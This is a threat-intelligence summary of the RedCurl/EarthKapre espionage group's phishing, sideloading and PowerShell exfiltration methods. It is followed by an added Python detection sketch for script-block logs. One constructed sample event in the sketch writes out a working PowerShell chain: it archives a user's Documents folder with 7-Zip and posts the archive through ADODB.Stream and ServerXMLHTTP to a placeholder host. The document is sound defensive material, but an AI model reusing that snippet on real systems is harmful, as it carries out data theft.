The RedCurl/EarthKapre APT group has been actively targeting organizations, particularly in the legal sector, for corporate espionage. Initial access comes through Indeed-themed phishing emails. A legitimate Adobe executable is then used to sideload the EarthKapre/RedCurl loader, which talks to command-and-control infrastructure hosted on Cloudflare Workers and exfiltrates data over that channel. Before deploying the loader, the attackers run reconnaissance tooling to map the target environment, then collect and exfiltrate sensitive data.
RedCurl also abuses PowerShell for data collection and exfiltration. Collected data is archived with 7-Zip and then uploaded from PowerShell through the MSXML2.ServerXMLHTTP and ADODB.Stream COM objects (ADODB.Stream to read the archive as a binary stream, ServerXMLHTTP to send it over HTTP). Both are stock Windows COM components, so the exfiltration step introduces no new binary beyond the archiver itself; PowerShell script block logging is the most direct place to catch it.
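The collection and exfiltration chain just described is exactly what PowerShell script block logging would record, so a detection can key on the combination of indicators rather than on any single COM object. The following is an added example, not code from the original page or from the RedCurl reporting it summarises. It assumes the input is the script text captured by script block logging (Event ID 4104); the sample events are constructed, the hostnames and URLs are placeholders, and the pairing rule is the editor's own choice.

```python
"""Detection sketch for the PowerShell staging + COM exfiltration chain.
Added example; the sample events below are constructed, not real telemetry,
and the rule logic is an editorial assumption, not a vendor signature."""
import re

# Indicator names and the regexes that detect them, in a fixed order so that
# result lists are deterministic.
INDICATORS = [
    # 7-Zip invoked with the "a" (add to archive) command, e.g.  7z.exe' a ...
    ("7zip_archive", re.compile(r"7za?(?:\.exe)?['\"]?\s+a\b", re.I)),
    # COM stream object, commonly used to read a file into a byte array
    ("adodb_stream", re.compile(r"ADODB\.Stream", re.I)),
    # COM HTTP client that can carry that byte array out of the network
    ("msxml_serverxmlhttp", re.compile(r"MSXML2\.ServerXMLHTTP", re.I)),
    # an HTTP POST prepared on that client
    ("http_post", re.compile(r"\.open\(\s*['\"]POST['\"]", re.I)),
]

# Constructed Event ID 4104-style records: host plus the logged script text.
SAMPLE_EVENTS = [
    {"host": "WS01",
     "script": "Get-ChildItem C:\\Users -Recurse | Out-File C:\\Temp\\list.txt"},
    {"host": "WS02",
     "script": (
         "& 'C:\\Temp\\7z.exe' a -p -mhe=on C:\\Temp\\out.7z C:\\Users\\a\\Documents\n"
         "$s = New-Object -ComObject ADODB.Stream; $s.Type = 1; $s.Open(); "
         "$s.LoadFromFile('C:\\Temp\\out.7z'); $b = $s.Read()\n"
         "$h = New-Object -ComObject MSXML2.ServerXMLHTTP; "
         "$h.open('POST', 'https://example.invalid/upload', $false); $h.send($b)")},
    {"host": "WS03",
     "script": ("$x = New-Object -ComObject MSXML2.ServerXMLHTTP; "
                "$x.open('GET', 'https://intranet.example.invalid/health', $false); "
                "$x.send()")},
]


def score_script(script: str) -> list[str]:
    """Return the names of all indicators present in one script block."""
    return [name for name, rx in INDICATORS if rx.search(script)]


def is_exfil_chain(indicators: list[str]) -> bool:
    """A lone ServerXMLHTTP call is ordinary admin scripting; alert only when
    the HTTP client is paired with file staging (an ADODB.Stream read or a
    7-Zip archive step) in the same script block."""
    found = set(indicators)
    return "msxml_serverxmlhttp" in found and bool(found & {"adodb_stream", "7zip_archive"})


def analyze(events: list[dict]) -> list[dict]:
    """Run the rules over a batch of script block events and return one
    finding per event that matches the exfiltration chain."""
    findings = []
    for ev in events:
        inds = score_script(ev["script"])
        if is_exfil_chain(inds):
            findings.append({"host": ev["host"], "indicators": inds})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['host']}: {', '.join(f['indicators'])}")
```

On the constructed input only WS02 is flagged; WS03 uses ServerXMLHTTP for a plain GET and stays quiet, which is the point of requiring the staging indicator alongside the HTTP client. In a real deployment the same rule would be fed from the Microsoft-Windows-PowerShell/Operational log, and the archive regex should be widened to whatever staging tool the environment actually sees.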